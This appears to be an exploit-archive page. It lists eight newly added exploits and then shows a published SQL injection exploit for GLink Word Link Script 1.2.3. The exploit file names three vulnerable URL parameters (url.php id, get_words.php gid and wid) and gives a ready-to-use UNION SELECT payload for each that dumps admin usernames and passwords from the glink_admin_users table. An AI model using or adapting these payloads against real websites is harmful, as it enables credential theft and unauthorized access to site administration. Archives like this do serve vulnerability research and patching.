8b5b662af9
8 new exploits SpyCamLizard 1.230 - Denial of Service APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow APNGDis 2.8 - 'filename' Stack Buffer Overflow Disk Sorter Enterprise 9.5.12 - 'GET' Buffer Overflow (SEH) SysGauge 1.5.18 - SMTP Validation Buffer Overflow (Metasploit) GLink Word Link Script 1.2.3 - SQL Injection Solare Datensysteme Solar-Log Devices 2.8.4-56 / 3.5.2-85 - Multiple Vulnerabilities
24 lines
No EOL
1.1 KiB
Text
Executable file
24 lines
No EOL
1.1 KiB
Text
Executable file
# # # # #
|
|
# Exploit Title: GLink Word Link Script v1.2.3 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 22.03.2017
|
|
# Vendor Homepage: http://www.tufat.com/
|
|
# Software: http://www.tufat.com/wp-content/uploads/sites/4/2015/zips/script_131.zip
|
|
# Demo: http://www.tufat.com/glink-word-link-script/
|
|
# Version: 1.2.3
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# #ihsansencan
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/url.php?id=[SQL]
|
|
# -1'+union+select+1,2,3,4,5,6,7,concat(user,0x3a,pass),9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-
|
|
# http://localhost/[PATH]/get_words.php?gid=[SQL]
|
|
# -1'+union+select+1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+glink_admin_users--+-&step=3
|
|
# http://localhost/[PATH]/get_words.php?wid=[SQL]
|
|
# -1'+union+select+1,2,concat(user,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+glink_admin_users--+-&gid=1&step=3
|
|
# Etc...
|
|
# # # # # |